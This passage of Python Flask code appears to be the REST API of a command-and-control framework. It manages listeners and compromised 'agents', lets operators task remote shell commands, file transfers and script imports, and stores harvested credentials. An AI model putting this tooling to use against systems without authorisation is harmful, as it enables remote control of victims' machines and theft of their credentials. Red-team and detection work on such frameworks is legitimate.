if success:
return jsonify({'success': True})
else:
# todo propagate the actual error with setting the value
return make_response(
jsonify({'error': 'error setting listener value %s with option %s' % (option_name, option_value)}), 400)
else:
return make_response(jsonify({'error': 'listener name %s not found or not inactive' % listener_name}), 404)
@app.route('/api/listeners/types', methods=['GET'])
def get_listener_types():
"""
Returns a list of the loaded listeners that are available for use.
"""
return jsonify({'types': list(main.listeners.loadedListeners.keys())})
@app.route('/api/listeners/options/<string:listener_type>', methods=['GET'])
def get_listener_options(listener_type):
"""
Returns JSON describing listener options for the specified listener type.
"""
if listener_type.lower() not in main.listeners.loadedListeners:
return make_response(jsonify({'error': 'listener type %s not found' % listener_type}), 404)
options = main.listeners.loadedListeners[listener_type].options
info = main.listeners.loadedListeners[listener_type].info
return jsonify({'listeneroptions': options, 'listenerinfo': info})
@app.route('/api/listeners/<string:listener_type>', methods=['POST'])
def start_listener(listener_type):
"""
Starts a listener with options supplied in the POST.
"""
if listener_type.lower() not in main.listeners.loadedListeners:
return make_response(jsonify({'error': 'listener type %s not found' % listener_type}), 404)
listener_name = request.json['Name']
dupe_check = Session().query(models.Listener).filter(models.Listener.name == listener_name).first()
if dupe_check:
return make_response(jsonify({'error': f'listener with name {listener_name} already exists'}), 400)
listenerObject = main.listeners.loadedListeners[listener_type]
# set all passed options
for option, values in request.json.items():
if isinstance(values, bytes):
values = values.decode('UTF-8')
returnVal = main.listeners.set_listener_option(listener_type, option, values)
if not returnVal:
return make_response(
jsonify({'error': 'error setting listener value %s with option %s' % (option, values)}), 400)
main.listeners.start_listener(listener_type, listenerObject)
# check to see if the listener was created
listenerID = main.listeners.get_listener_id(listener_name)
if listenerID:
return jsonify({'success': 'Listener %s successfully started' % listener_name})
else:
return jsonify({'error': 'failed to start listener %s' % listener_name})
@app.route('/api/agents', methods=['GET'])
def get_agents():
"""
Returns JSON describing all currently registered agents.
"""
active_agents_raw = Session().query(models.Agent).filter(models.Agent.killed == False).all()
agents = []
for active_agent in active_agents_raw:
agents.append(
{"ID": active_agent.id, "session_id": active_agent.session_id, "listener": active_agent.listener,
"name": active_agent.name, "language": active_agent.language,
"language_version": active_agent.language_version, "delay": active_agent.delay,
"jitter": active_agent.jitter, "external_ip": active_agent.external_ip,
"internal_ip": active_agent.internal_ip, "username": active_agent.username,
"high_integrity": int(active_agent.high_integrity or 0), "process_name": active_agent.process_name,
"process_id": active_agent.process_id, "hostname": active_agent.hostname,
"os_details": active_agent.os_details,
"session_key": str(active_agent.session_key),
"nonce": active_agent.nonce, "checkin_time": active_agent.checkin_time,
"lastseen_time": active_agent.lastseen_time, "parent": active_agent.parent,
"children": active_agent.children, "servers": active_agent.servers, "profile": active_agent.profile,
"functions": active_agent.functions, "kill_date": active_agent.kill_date,
"working_hours": active_agent.working_hours, "lost_limit": active_agent.lost_limit,
"stale": active_agent.stale, "notes": active_agent.notes, "architecture": active_agent.architecture,
"proxy": active_agent.proxy})
return jsonify({'agents': agents})
@app.route('/api/agents/active', methods=['GET'])
def get_active_agents():
"""
Returns JSON describing all currently registered agents.
"""
active_agents_raw = Session().query(models.Agent).filter(models.Agent.killed == False).all()
agents = []
for active_agent in active_agents_raw:
if active_agent.stale is False:
agents.append(
{"ID": active_agent.id, "session_id": active_agent.session_id, "listener": active_agent.listener,
"name": active_agent.name, "language": active_agent.language,
"language_version": active_agent.language_version, "delay": active_agent.delay,
"jitter": active_agent.jitter, "external_ip": active_agent.external_ip,
"internal_ip": active_agent.internal_ip, "username": active_agent.username,
"high_integrity": int(active_agent.high_integrity or 0), "process_name": active_agent.process_name,
"process_id": active_agent.process_id, "hostname": active_agent.hostname,
"os_details": active_agent.os_details,
"session_key": str(active_agent.session_key),
"nonce": active_agent.nonce, "checkin_time": active_agent.checkin_time,
"lastseen_time": active_agent.lastseen_time, "parent": active_agent.parent,
"children": active_agent.children, "servers": active_agent.servers, "profile": active_agent.profile,
"functions": active_agent.functions, "kill_date": active_agent.kill_date,
"working_hours": active_agent.working_hours, "lost_limit": active_agent.lost_limit,
"stale": active_agent.stale, "notes": active_agent.notes, "architecture": active_agent.architecture,
"proxy": active_agent.proxy})
return jsonify({'agents': agents})
@app.route('/api/agents/stale', methods=['GET'])
def get_agents_stale():
"""
Returns JSON describing all stale agents.
"""
agents_raw = Session().query(models.Agent).all()
stale_agents = []
for agent in agents_raw:
if agent.stale:
stale_agents.append(
{"ID": agent.id, "session_id": agent.session_id, "listener": agent.listener, "name": agent.name,
"language": agent.language, "language_version": agent.language_version, "delay": agent.delay,
"jitter": agent.jitter, "external_ip": agent.external_ip, "internal_ip": agent.internal_ip,
"username": agent.username, "high_integrity": int(agent.high_integrity or 0),
"process_name": agent.process_name, "process_id": agent.process_id, "hostname": agent.hostname,
"os_details": agent.os_details, "session_key": str(agent.session_key), "nonce": agent.nonce,
"checkin_time": agent.checkin_time, "lastseen_time": agent.lastseen_time, "parent": agent.parent,
"children": agent.children, "servers": agent.servers, "profile": agent.profile,
"functions": agent.functions, "kill_date": agent.kill_date, "working_hours": agent.working_hours,
"lost_limit": agent.lost_limit, "architecture": agent.architecture, "proxy": agent.proxy})
return jsonify({'agents': stale_agents})
@app.route('/api/agents/stale', methods=['DELETE'])
def remove_stale_agent():
"""
Removes all stale agents from the controller.
WARNING: doesn't kill the agent first! Ensure the agent is dead.
"""
agents_raw = Session().query(models.Agent).all()
for agent in agents_raw:
if agent.stale:
agent.killed = True
Session().commit()
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>', methods=['DELETE'])
def remove_agent(agent_name):
"""
Removes an agent from the controller specified by agent_name.
WARNING: doesn't kill the agent first! Ensure the agent is dead.
"""
agent = Session().query(models.Agent).filter(models.Agent.name == agent_name).first()
if not agent:
return make_response(jsonify({'error': 'agent %s not found' % agent_name}), 404)
agent.killed = True
Session().commit()
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>', methods=['GET'])
def get_agents_name(agent_name):
"""
Returns JSON describing the agent specified by agent_name.
"""
agent = Session().query(models.Agent).filter(models.Agent.name == agent_name).first()
if not agent:
return make_response(jsonify({'error': 'agent %s not found' % agent_name}), 404)
active_agent = []
active_agent.append(
{"ID": agent.id, "session_id": agent.session_id, "listener": agent.listener, "name": agent.name,
"language": agent.language, "language_version": agent.language_version, "delay": agent.delay,
"jitter": agent.jitter, "external_ip": agent.external_ip, "internal_ip": agent.internal_ip,
"username": agent.username, "high_integrity": int(agent.high_integrity or 0),
"process_name": agent.process_name,
"process_id": agent.process_id, "hostname": agent.hostname, "os_details": agent.os_details,
"session_key": str(agent.session_key),
"nonce": agent.nonce, "checkin_time": agent.checkin_time,
"lastseen_time": agent.lastseen_time, "parent": agent.parent, "children": agent.children,
"servers": agent.servers, "profile": agent.profile, "functions": agent.functions,
"kill_date": agent.kill_date, "working_hours": agent.working_hours,
"lost_limit": agent.lost_limit, "architecture": agent.architecture, "proxy": agent.proxy})
return jsonify({'agents': active_agent})
@app.route('/api/agents/<string:agent_name>/processes', methods=['GET'])
def get_host_process(agent_name):
"""
Gets the processes from the processes table for a given agent. Processes are stored at the host level,
so it looks up the host from the agent and then gets the processes for that host.
"""
agent = Session().query(models.Agent).filter(models.Agent.session_id == agent_name).first()
processes = []
if agent:
processes_raw: List[models.HostProcess] = Session().query(models.HostProcess).filter(models.HostProcess.host_id == agent.host_id).all()
for proc in processes_raw:
agent_session_id = None
if proc.agent:
agent_session_id = proc.agent.session_id
processes.append({'host_id': proc.host_id, 'process_id': proc.process_id,
'process_name': proc.process_name, 'agent_session_id': agent_session_id,
'architecture': proc.architecture, 'user': proc.user})
return {'processes': processes}
@app.route('/api/agents/<string:agent_name>/directory', methods=['POST'])
def scrape_agent_directory(agent_name):
directory = '/' if request.args.get('directory') is None else request.args.get('directory')
task_id = main.agents.add_agent_task_db(agent_name, "TASK_DIR_LIST", directory, g.user['id'])
return jsonify({'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/directory', methods=['GET'])
def get_agent_directory(agent_name):
# Would be cool to add a "depth" param
directory = '/' if request.args.get('directory') is None else request.args.get('directory')
found = Session().query(models.AgentFile).filter(and_(
models.AgentFile.session_id == agent_name,
models.AgentFile.path == directory)).first()
if not found:
return make_response(jsonify({'error': "Directory not found."}), 404)
agent_file_alias = aliased(models.AgentFile)
results = Session() \
.query(models.AgentFile.id.label("id"),
models.AgentFile.session_id.label("session_id"),
models.AgentFile.name.label("name"),
models.AgentFile.path.label("path"),
models.AgentFile.parent_id.label("parent_id"),
models.AgentFile.is_file.label("is_file"),
agent_file_alias.name.label("parent_name"),
agent_file_alias.path.label("parent_path"),
agent_file_alias.parent_id.label("parent_parent")) \
.select_from(models.AgentFile) \
.join(agent_file_alias,
models.AgentFile.parent_id == agent_file_alias.id) \
.filter(and_(models.AgentFile.session_id == agent_name, agent_file_alias.path == directory)) \
.all()
response = []
for result in results:
response.append({'id': result.id, 'session_id': result.session_id, 'name': result.name, 'path': result.path,
'parent_id': result.parent_id, 'is_file': result.is_file,
'parent_name': result.parent_name,
'parent_path': result.parent_path, 'parent_parent': result.parent_parent})
return jsonify({'items': response})
@app.route('/api/agents/<string:agent_name>/results', methods=['GET'])
def get_agent_results(agent_name):
"""
Returns JSON describing the agent's results and removes the result field
from the backend database.
"""
agent_task_results = []
query_options = [joinedload(models.Tasking.user)]
query = Session().query(models.Tasking) \
.filter(models.Tasking.agent_id == agent_name)
if request.args.get('include_full_input'):
query_options.append(undefer('input_full'))
if request.args.get('include_original_output'):
query_options.append(undefer('original_output'))
if request.args.get('updated_since'):
try:
                since = request.args.get('updated_since')
                since = since.replace('Z', '+00:00')  # fromisoformat does not recognize Z as UTC
                timestamp = datetime.fromisoformat(since).astimezone(timezone.utc)
query = query.filter(models.Tasking.updated_at > timestamp)
except ValueError as e:
return make_response({'error': f'Invalid ISO-8601 timestamp: {request.args.get("updated_since")}'}, 400)
query = query.options(*query_options)
tasks: List[models.Tasking] = query.all()
results = []
for task in tasks:
res = {'taskID': task.id, 'command': task.input,
'results': task.output, 'user_id': task.user_id,
'created_at': task.created_at, 'updated_at': task.updated_at,
'username': task.user.username, 'agent': task.agent_id}
if request.args.get('include_full_input'):
res['full_input'] = task.input_full
if request.args.get('include_original_output'):
res['original_output'] = task.original_output
results.append(res)
agent_task_results.append({"AgentName": agent_name, "AgentResults": results})
return jsonify({'results': agent_task_results})
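# Supported query parameters for the results route above, shown with illustrative values:
#   include_full_input=true, include_original_output=true, updated_since=2021-01-01T00:00:00Z
# updated_since is parsed as an ISO-8601 timestamp and compared against Tasking.updated_at.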
@app.route('/api/agents/<string:agent_name>/task/<int:task_id>', methods=['GET'])
def get_task(agent_name, task_id):
"""
Returns json about a task from the database.
"""
task: models.Tasking = Session().query(models.Tasking) \
.filter(models.Tasking.agent_id == agent_name) \
.filter(models.Tasking.id == task_id) \
.options(joinedload(models.Tasking.user)) \
.first()
if task:
output = {'taskID': task.id, 'command': task.input, 'results': task.output,
'user_id': task.user_id, 'username': task.user.username, 'agent': task.agent_id}
if request.args.get('include_full_input'):
output['full_input'] = task.input_full
if request.args.get('include_original_output'):
output['original_output'] = task.original_output
return make_response(jsonify(output))
return make_response(jsonify({'error': 'task not found.'}), 404)
@app.route('/api/agents/<string:agent_name>/task/slim', methods=['GET'])
def get_agent_tasks_slim(agent_name):
"""
Provides a slimmed down view of agent tasks.
This is useful when trying to get a quick list of actions taken on an agent without
all the overhead of the joined tables or tasking result bloat.
:param agent_name:
:return:
"""
query = Session().query(models.Tasking.id,
models.Tasking.input,
models.Tasking.agent_id,
models.Tasking.user_id,
models.User.username) \
.filter(models.Tasking.agent_id == agent_name) \
.join(models.User, models.Tasking.user_id == models.User.id) \
.order_by(models.Tasking.id.asc())
if request.args.get('num_results'):
query = query.limit(request.args.get('num_results'))
tasks = query.all()
agent_tasks = []
for task in tasks:
agent_tasks.append(
{'taskID': task.id, 'command': task.input,
'agent': task.agent_id, 'user_id': task.user_id,
'username': task.username})
return jsonify({'tasks': agent_tasks})
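# Illustrative request for the slim tasks route above (value is an example):
#   GET /api/agents/<agent>/task/slim?num_results=10
# Results are ordered by task id ascending, so the limit keeps the earliest taskings.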
@app.route('/api/agents/<string:agent_name>/task', methods=['GET'])
def get_agent_tasks(agent_name):
"""
Returns JSON of the last num_results tasks for an agent.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.args.get('num_results'):
return make_response(jsonify({'error': 'number of results to return not provided'}), 404)
num_results = int(request.args.get('num_results'))
tasks = Session().query(models.Tasking) \
.filter(models.Tasking.agent_id == agent_name) \
.options(joinedload(models.Tasking.user)) \
.order_by(models.Tasking.id.desc()) \
.limit(num_results).all()
agent_tasks = []
for task in tasks:
agent_tasks.append(
{'taskID': task.id, 'command': task.input, 'results': task.output,
'user_id': task.user_id, 'username': task.user.username, 'agent': task.agent_id})
return jsonify({'agent': agent_tasks})
@app.route('/api/agents/<string:agent_name>/results', methods=['DELETE'])
def delete_agent_results(agent_name):
"""
Removes the specified agent results field from the backend database.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if not agent:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
agent.results = ''
Session().commit()
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>/download', methods=['POST'])
def task_agent_download(agent_name):
"""
Tasks the specified agent to download a file
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.json['filename']:
return make_response(jsonify({'error': 'file name not provided'}), 404)
file_name = request.json['filename']
msg = "Tasked agent to download %s" % file_name
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_DOWNLOAD', file_name, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/upload', methods=['POST'])
def task_agent_upload(agent_name):
"""
Tasks the specified agent to upload a file
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.json['data']:
return make_response(jsonify({'error': 'file data not provided'}), 404)
if not request.json['filename']:
return make_response(jsonify({'error': 'file name not provided'}), 404)
file_data = request.json['data']
file_name = request.json['filename']
raw_bytes = base64.b64decode(file_data)
if len(raw_bytes) > 1048576:
return make_response(jsonify({'error': 'file size too large'}), 404)
msg = "Tasked agent to upload %s : %s" % (file_name, hashlib.md5(raw_bytes).hexdigest())
main.agents.save_agent_log(agent.session_id, msg)
data = file_name + "|" + file_data
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_UPLOAD', data, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
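# Illustrative upload body (filename is hypothetical); 'data' must be base64-encoded and the
# decoded payload is capped at 1048576 bytes (1 MB):
#   {"filename": "notes.txt", "data": "<base64 string>"}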
@app.route('/api/agents/<string:agent_name>/shell', methods=['POST'])
def task_agent_shell(agent_name):
"""
Tasks the specified agent to execute a shell command.
Takes {'command':'shell_command'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
command = request.json['command']
if command == 'sysinfo':
task_id = main.agents.add_agent_task_db(agent_name, "TASK_SYSINFO")
else:
# add task command to agent taskings
msg = "tasked agent %s to run command %s" % (agent.session_id, command)
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_SHELL", command, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
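# Illustrative usage of the shell route above (agent name and command are hypothetical):
#   POST /api/agents/XY12AB34/shell with body {"command": "whoami"}
# The literal command 'sysinfo' is turned into a TASK_SYSINFO tasking instead of TASK_SHELL;
# a successful call returns {"success": true, "taskID": <id>} once the task is queued.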
@app.route('/api/agents/<string:agent_name>/sleep', methods=['PUT'])
def set_agent_sleep(agent_name):
"""
Tasks the specified agent to sleep or change jitter
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
if not request.json or 'delay' not in request.json or 'jitter' not in request.json:
return make_response(jsonify({'error': 'Jitter and sleep interval are not provided'}), 400)
agent_delay = int(request.json['delay'])
agent_jitter = float(request.json['jitter'])
if agent_delay >= 0:
agent.delay = agent_delay
else:
return make_response(jsonify({'error': 'Delay must be a positive integer'}), 400)
if agent_jitter >= 0 and agent_jitter <= 1:
agent.jitter = agent_jitter
else:
return make_response(jsonify({'error': 'Jitter must be between 0.0 and 1.0'}), 400)
if agent.language == 'powershell':
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_SHELL',
'Set-Delay ' + str(agent_delay) + ' ' + str(agent_jitter))
elif agent.language == 'python':
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_CMD_WAIT", "global delay; global jitter; delay=%s; jitter=%s; print('delay/jitter set to %s/%s')" % (agent_delay, agent_jitter, agent_delay, agent_jitter))
elif agent.language == 'csharp':
task_id = main.agents.add_agent_task_db(agent.session_id, 'TASK_SHELL',
'Set-Delay ' + str(agent_delay) + ' ' + str(agent_jitter))
else:
return make_response(jsonify({'error': 'sleep is not supported for agent language %s' % agent.language}), 400)
Session().commit()
# dispatch this event
msg = "[*] Tasked agent to sleep delay/jitter {}/{}".format(agent_delay, agent_jitter)
main.agents.save_agent_log(agent.session_id, msg)
return jsonify({'success': True, 'taskID': task_id})
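# Illustrative sleep body (values are examples only): {"delay": 60, "jitter": 0.2}
# delay must be a non-negative integer and jitter must fall between 0.0 and 1.0.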
@app.route('/api/agents/<string:agent_name>/script_import', methods=['POST'])
def task_agent_script_import(agent_name):
"""
Imports a PowerShell script and keeps it in memory in the agent.
Takes {'script':'script_location'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
path = main.installPath + '/' + request.json['script']
if path != "" and os.path.exists(path):
with open(path, 'r') as open_file:
script_data = open_file.read()
# strip out comments and blank lines from the imported script
script_data = helpers.strip_powershell_comments(script_data)
# add task command to agent taskings
msg = "tasked agent %s to run command %s" % (agent.session_id, script_data)
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_SCRIPT_IMPORT", script_data,
uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
else:
return make_response(jsonify({'error': 'Unable to find script'}), 404)
@app.route('/api/agents/<string:agent_name>/script_command', methods=['POST'])
def task_agent_script_command(agent_name):
"""
"Execute a function in the currently imported PowerShell script."
Takes {'script':'scipt_command'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
command = request.json['script']
# add task command to agent taskings
msg = "tasked agent %s to run command %s" % (agent.session_id, command)
main.agents.save_agent_log(agent.session_id, msg)
task_id = main.agents.add_agent_task_db(agent.session_id, "TASK_SCRIPT_COMMAND", command, uid=g.user['id'])
return jsonify({'success': True, 'taskID': task_id})
@app.route('/api/agents/<string:agent_name>/update_comms', methods=['PUT'])
def agent_update_comms(agent_name):
"""
Dynamically update the agent comms to another
Takes {'listener': 'name'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'listener' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "listener"'}), 400)
listener_name = request.json['listener']
if not main.listeners.is_listener_valid(listener_name):
return jsonify({'error': 'Please enter a valid listener name.'})
else:
active_listener = main.listeners.activeListeners[listener_name]
if active_listener['moduleName'] not in ('meterpreter', 'http_mapi'):
listener_options = active_listener['options']
listener_comms = main.listeners.loadedListeners[active_listener['moduleName']].generate_comms(
listener_options, language="powershell")
main.agents.add_agent_task_db(agent_name, "TASK_UPDATE_LISTENERNAME", listener_options['Name']['Value'])
main.agents.add_agent_task_db(agent_name, "TASK_SWITCH_LISTENER", listener_comms)
msg = "Tasked agent to update comms to %s listener" % listener_name
main.agents.save_agent_log(agent_name, msg)
return jsonify({'success': True})
else:
return jsonify(
{'error': 'Ineligible listener for updatecomms command: %s' % active_listener['moduleName']})
@app.route('/api/agents/<string:agent_name>/proxy', methods=['GET'])
def get_proxy_info(agent_name):
"""
Returns JSON describing the available proxy configuration options.
"""
proxy_info = {'Name': 'Proxies',
'Author': 'Cx01N',
'Background': '',
'Comments': '',
'Description': '',
'options': {'Address': {'Description': 'Address for the proxy.',
'Required': True,
'Value': '',
'SuggestedValues': '',
'Strict': ''},
'Proxy_Type': {'Description': 'Type of proxy to be used.',
'Required': True,
'Value': '',
'SuggestedValues': ['SOCKS4', 'SOCKS5', 'HTTP', 'SSL', 'SSL_WEAK',
'SSL_ANON', 'TOR', 'HTTPS', 'HTTP_CONNECT',
'HTTPS_CONNECT'],
'Strict': True},
'Port': {'Description': 'Port number for the proxy.',
'Required': True,
'Value': '',
'SuggestedValues': '',
'Strict': ''}
}
}
return jsonify({'proxy': proxy_info})
@app.route('/api/agents/<string:agent_name>/proxy', methods=['PUT'])
def agent_update_proxy(agent_name):
"""
Dynamically update the agent proxy
Takes {'proxy': 'options'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'proxy' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "listener"'}), 400)
proxy_list = request.json['proxy']
for x in range(len(proxy_list)):
proxy_list[x]['proxytype'] = PROXY_NAME[proxy_list[x]['proxytype']]
agent = Session().query(models.Agent).filter(
or_(models.Agent.session_id == agent_name, models.Agent.name == agent_name)).first()
agent.proxy = proxy_list
Session().commit()
main.agents.add_agent_task_db(agent_name, "TASK_SET_PROXY", json.dumps(proxy_list))
return jsonify({'success': True})
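# Illustrative proxy body (values are examples only; additional per-proxy fields elided):
#   {"proxy": [{"proxytype": "SOCKS5", ...}]}
# Each entry's 'proxytype' is mapped through PROXY_NAME before being stored and tasked.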
@app.route('/api/agents/<string:agent_name>/killdate', methods=['PUT'])
def agent_kill_date(agent_name):
"""
Set an agent's killdate (01/01/2016)
Takes {'kill_date': 'date'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'kill_date' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "kill_date"'}), 400)
try:
kill_date = request.json['kill_date']
agent = Session().query(models.Agent).filter(
or_(models.Agent.session_id == agent_name, models.Agent.name == agent_name)).first()
agent.kill_date = kill_date
Session().commit()
# task the agent
main.agents.add_agent_task_db(agent_name, "TASK_SHELL", "Set-KillDate " + str(kill_date))
# update the agent log
msg = "Tasked agent to set killdate to " + str(kill_date)
main.agents.save_agent_log(agent_name, msg)
return jsonify({'success': True})
except Exception:
return jsonify({'error': 'Unable to update agent killdate'})
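# Illustrative kill date body (example value in the documented format): {"kill_date": "01/01/2016"}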
@app.route('/api/agents/<string:agent_name>/workinghours', methods=['PUT'])
def agent_working_hours(agent_name):
"""
Set an agent's working hours (9:00-17:00)
Takes {'working_hours': 'working_hours'}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'working_hours' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "working_hours"'}), 400)
try:
working_hours = request.json['working_hours']
working_hours = working_hours.replace(",", "-")
agent = Session().query(models.Agent).filter(
or_(models.Agent.session_id == agent_name, models.Agent.name == agent_name)).first()
agent.working_hours = working_hours
Session().commit()
# task the agent
main.agents.add_agent_task_db(agent_name, "TASK_SHELL", "Set-WorkingHours " + str(working_hours))
# update the agent log
msg = "Tasked agent to set working hours to " + str(working_hours)
main.agents.save_agent_log(agent_name, msg)
return jsonify({'success': True})
except Exception:
return jsonify({'error': 'Unable to update agent working hours'})
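# Illustrative working hours body (example value): {"working_hours": "9:00-17:00"}
# Commas in the supplied value are normalized to dashes before tasking.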
@app.route('/api/agents/<string:agent_name>/rename', methods=['POST'])
def task_agent_rename(agent_name):
"""
Renames the specified agent.
Takes {'newname': 'NAME'}
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if not agent:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
new_name = request.json['newname']
try:
result = main.agents.rename_agent(agent_name, new_name)
if not result:
return make_response(jsonify({
'error': 'error in renaming %s to %s, new name may have already been used' % (
agent_name, new_name)}), 400)
return jsonify({'success': True})
except Exception:
return make_response(jsonify({'error': 'error in renaming %s to %s' % (agent_name, new_name)}), 400)
@app.route('/api/agents/<string:agent_name>/clear', methods=['POST', 'GET'])
def task_agent_clear(agent_name):
"""
Clears the tasking buffer for the specified agent.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
main.agents.clear_agent_tasks_db(agent_name)
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>/kill', methods=['POST', 'GET'])
def task_agent_kill(agent_name):
"""
Tasks the specified agent to exit.
"""
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if agent is None:
return make_response(jsonify({'error': 'agent name %s not found' % agent_name}), 404)
# task the agent to exit
msg = "tasked agent %s to exit" % agent.session_id
main.agents.save_agent_log(agent.session_id, msg)
main.agents.add_agent_task_db(agent.session_id, 'TASK_EXIT', uid=g.user['id'])
return jsonify({'success': True})
@app.route('/api/agents/<string:agent_name>/notes', methods=['POST'])
def update_agent_notes(agent_name):
"""
Update notes on specified agent.
{"notes" : "notes here"}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if not 'notes' in request.json:
return make_response(jsonify({'error': 'JSON body must include key "notes"'}), 400)
agent = main.agents.get_agent_from_name_or_session_id(agent_name)
if not agent:
return make_response(jsonify({'error': f'Agent not found with name {agent_name}'}), 404)
agent.notes = request.json['notes']
Session().commit()
return jsonify({'success': True})
@app.route('/api/creds', methods=['GET'])
def get_creds():
"""
Returns JSON describing the credentials stored in the backend database.
"""
credential_list = []
credentials_raw = Session().query(models.Credential).all()
for credential in credentials_raw:
credential_list.append({"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes})
return jsonify({'creds': credential_list})
@app.route('/api/creds/<int:uid>', methods=['GET'])
def get_cred(uid):
"""
Returns JSON describing the credentials stored in the backend database.
"""
credential = Session().query(models.Credential).filter(models.Credential.id == uid).first()
if credential:
return {"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes}
return make_response(jsonify({'error': f'Credential {uid} not found'}), 404)
@app.route('/api/creds', methods=['POST'])
def add_creds():
"""
Adds credentials to the database
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
required_fields = ["credtype", "domain", "username", "password", "host"]
optional_fields = ["OS", "notes", "sid"]
cred = request.json
# ensure every credential given to us has all the required fields
if not all(k in cred for k in required_fields):
return make_response(jsonify({'error': 'invalid credential fields'}), 400)
# ensure the type is either "hash" or "plaintext"
if not (cred['credtype'] == u'hash' or cred['credtype'] == u'plaintext'):
return make_response(
jsonify({'error': 'invalid credential type in credtype, must be "hash" or "plaintext"'}), 400)
os = request.json.get('os', '')
notes = request.json.get('notes', '')
sid = request.json.get('sid', '')
credential = main.credentials.add_credential(
cred['credtype'],
cred['domain'],
cred['username'],
cred['password'],
cred['host'],
os,
sid,
notes
)
if credential:
return {"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes}
return make_response(jsonify({'error': "Error writing credential. Check you aren't writing a duplicate."}), 400)
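# Illustrative credential body (values are hypothetical); 'os', 'notes' and 'sid' are optional:
#   {"credtype": "plaintext", "domain": "CORP", "username": "alice",
#    "password": "<password>", "host": "WORKSTATION01"}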
@app.route('/api/creds/<int:uid>', methods=['DELETE'])
def remove_cred(uid):
"""
Delete credential from database.
"""
cred = Session().query(models.Credential).filter(models.Credential.id == uid).first()
if cred:
Session().delete(cred)
Session().commit()
return jsonify({"success": True})
return make_response(jsonify({'error': f'Credential {uid} not found'}), 404)
@app.route('/api/creds/<int:uid>', methods=['PUT'])
def edit_cred(uid):
"""
Edit credential in database
"""
if not request.json:
abort(400)
required_fields = ["credtype", "domain", "username", "password", "host"]
if not all(k in request.json for k in required_fields):
return make_response(jsonify({'error': 'invalid credential'}), 400)
# ensure the type is either "hash" or "plaintext"
if not (request.json['credtype'] == u'hash' or request.json['credtype'] == u'plaintext'):
return make_response(
jsonify({'error': 'invalid credential type, must be "hash" or "plaintext"'}), 400)
credential: models.Credential = Session().query(models.Credential).filter(models.Credential.id == uid).first()
if credential:
credential.credtype = request.json['credtype']
credential.domain = request.json['domain']
credential.username = request.json['username']
credential.password = request.json['password']
credential.host = request.json['host']
credential.os = request.json.get('os', '')
credential.notes = request.json.get('notes', '')
credential.sid = request.json.get('sid', '')
Session().commit()
return {"ID": credential.id, "credtype": credential.credtype, "domain": credential.domain,
"username": credential.username, "password": credential.password,
"host": credential.host, "os": credential.os, "sid": credential.sid,
"notes": credential.notes}
return make_response(jsonify({'error': f'Credential {uid} not found'}), 404)
@app.route('/api/reporting', methods=['GET'])
def get_reporting():
"""
Returns JSON describing the reporting events from the backend database.
"""
# Add filters for agent, event_type, and MAYBE a like filter on msg
reporting_raw = main.run_report_query()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"timestamp": reporting_event.timestamp, "event_type": reporting_event.event_type,
"username": reporting_event.username, "agent_name": reporting_event.agent_name,
